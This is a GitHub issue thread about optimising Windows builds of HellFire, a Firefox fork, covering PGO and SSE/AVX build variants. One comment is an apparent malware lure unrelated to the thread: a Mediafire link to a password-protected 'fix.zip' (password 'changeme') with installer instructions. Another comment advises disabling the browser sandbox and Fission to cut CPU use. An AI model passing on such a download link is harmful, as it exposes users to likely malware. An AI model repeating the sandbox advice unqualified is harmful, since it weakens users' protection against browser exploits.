### ISSUE TITLE
Windows build likely needs a more optimized mozconfig

### ISSUE THREAD

**Issue by GunGunGun** [CYFARE/HellFire#3]
A Japanese developer is providing a super optimized build for Windows using CSPGO, it's probably the fastest Firefox build for Windows out there, can you investigate and include their mozconfig to improve Windows builds ?

http://www1.plala.or.jp/tete009/en-US/software.html#FIREFOX

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CYFARE** [comment]
### Issue

HellFire uses PGO as well. I don't see any benchmarks, mozconfigs or similar on the site. From what I see is that the developer has their own patches to the source, it's their personal builds, which is different from HellFire. I don't clone the source to include anything from my side. Also, I won't be testing or benchmarking with lack of clarity of what patches are made to the source and don't see anything different other than them providing SSE3 builds which may not run on some intel cpu's.

### Action Plan

From my side, the only takeaway for me if to provide additional SSE3 and SSE4 builds. Other than that, my mozconfig pretty much has everything in place to make the build process error free (like not using static VC compiler which messes up the builds more than the recommended flags by Mozilla) and provide highly optimized builds.

### Takeaway

I have provided the results of quite regorous benchmarks comparing HellFire with Thorium/Mercury and Ungoogled Chromium, and so far HellFire builds outperformed both in most metrics. All the benchmarks detailed sheets are provided in the repo to see.

Apart from SSE4 builds, I may provide other interesting flags like AVX2 - but these additional special builds will be updated in the same release after the general builds.

### **Thanks for using HellFire and I appreciate your contribution!**

**Comment by pundoo** [comment]
Hi, can you please also provide AVX builds as well, if possible? It seems AVX build of Mercury performs a little better on my relatively old hardware. Regardless, thank you so much for your effort on making this. Definitely faster than any other alternatives I've tried so far.

PS: Out of curiosity, is there any special flags that may reduce resource consumption (mainly CPU) even further when playing HD videos on old hardware?

**Comment by pundoo** [comment]
@CYFARE 

Hi, can you please also provide AVX builds as well, if possible? It seems AVX build of Mercury performs a little better for me. Regardless, thank you so much for your effort on making this. Definitely faster than any other alternatives I've tried so far.

PS: Out of curiosity, is there any special flags that may reduce resource consumption (mainly CPU) even further when playing HD videos on old hardware?

**Comment by GunGunGun** [comment]
> PS: Out of curiosity, is there any special flags that may reduce resource consumption (mainly CPU) even further when playing HD videos on old hardware?

Disabling sandboxes & Fission is likely your only option.

**Comment by CYFARE** [comment]
> @CYFARE
> 
> Hi, can you please also provide AVX builds as well, if possible? It seems AVX build of Mercury performs a little better for me. Regardless, thank you so much for your effort on making this. Definitely faster than any other alternatives I've tried so far.
> 
> PS: Out of curiosity, is there any special flags that may reduce resource consumption (mainly CPU) even further when playing HD videos on old hardware?

Hi, AVX + SSE3 build is now provided for GNU/Linux and will be provided in the future as well.

**Comment by ioc2e3** [comment]
> Disabling sandboxes & Fission is likely your only option.

Excuse me ...

Where to disable ( Sandbox ) and ( Fission ) ?

.
